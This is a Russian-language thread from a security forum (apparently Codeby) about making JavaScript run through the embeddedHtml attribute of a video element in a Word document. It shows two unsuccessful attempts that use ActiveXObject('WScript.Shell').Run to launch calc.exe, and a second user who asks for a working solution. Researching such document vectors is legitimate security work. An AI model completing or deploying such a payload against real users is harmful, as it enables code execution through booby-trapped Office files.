Атака с помощью word

OpenDoor

Newbie
16.02.2020
1
0
Всем привет, меня интересует один вопрос, если смотреть видео от codeby , то в нем вставляют html вставку вместо видео, поизучав дополнительно об этом я нашел файл на гите в котором говорится о HTML/JS инжекте.
Так вот, сам вопрос, как произвести JS инжект(хочу вызвать калькулятор), кто-нибудь пробовал/реализовывал ?
PS мои успехи в это деле(я пытался)

HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml="<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>

заменял embeddedHtml на
HTML:
&lt;script&gt;
var ws = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;C:\\WINDOWS\\system32\\calc.exe&quot;,0);
&lt;/script&gt;

word открывается без ошибок, но кликая на видео word говорил, что не правильно указан URL

еще делал так
HTML:
<wp15:webVideoPr w="480" h="270"
embeddedHtml=
"
<iframe width="480" height="270"
src="https://www.youtube.com/embed/VtnnEVg3S3Y?start=1254&feature=oembed"
frameborder="0"
allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
allowfullscreen="">
</iframe>
&lt;script&gt;
var ws = new ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;C:\\WINDOWS\\system32\\calc.exe&quot;,0);
&lt;/script&gt;
"
xmlns:wp15="http://schemas.microsoft.com/office/word/2012/wordprocessingDrawing"/>

тут уже лучше, ошибки нет, но и калькулятор не запускается, в чем может быть ошибка?

PSS Word365(лицензия)
PSSS идентификатора CVE у нее, вроде бы, нет.
 
Тоже ковырял эту багу но так нечего и не вышло. Если кто то имеет решение стукните в ПМ. плз.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab